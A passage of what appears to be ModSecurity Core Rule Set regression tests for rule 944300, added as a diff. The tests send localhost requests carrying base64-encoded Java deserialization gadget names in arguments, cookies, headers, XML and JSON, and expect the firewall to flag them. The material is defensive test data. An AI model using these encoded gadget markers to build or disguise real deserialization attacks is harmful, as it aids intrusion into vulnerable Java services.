"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-163 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-164 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-165 + desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-166 + desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-167 + desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-168 + desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-169 + desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-170 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-171 + desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-172 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-173 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-174 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-175 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-176 + desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-177 + desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-178 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-179 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-180 + desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-181 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-182 + desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-183 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-184 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-185 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-186 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-187 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-188 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-189 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-190 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-191 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-192 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-193 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-194 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-195 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-196 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-197 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-198 + desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-199 + desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-200 + desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-201 + desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-202 + desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-203 + desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-204 + desc: "XML element value includes keyword 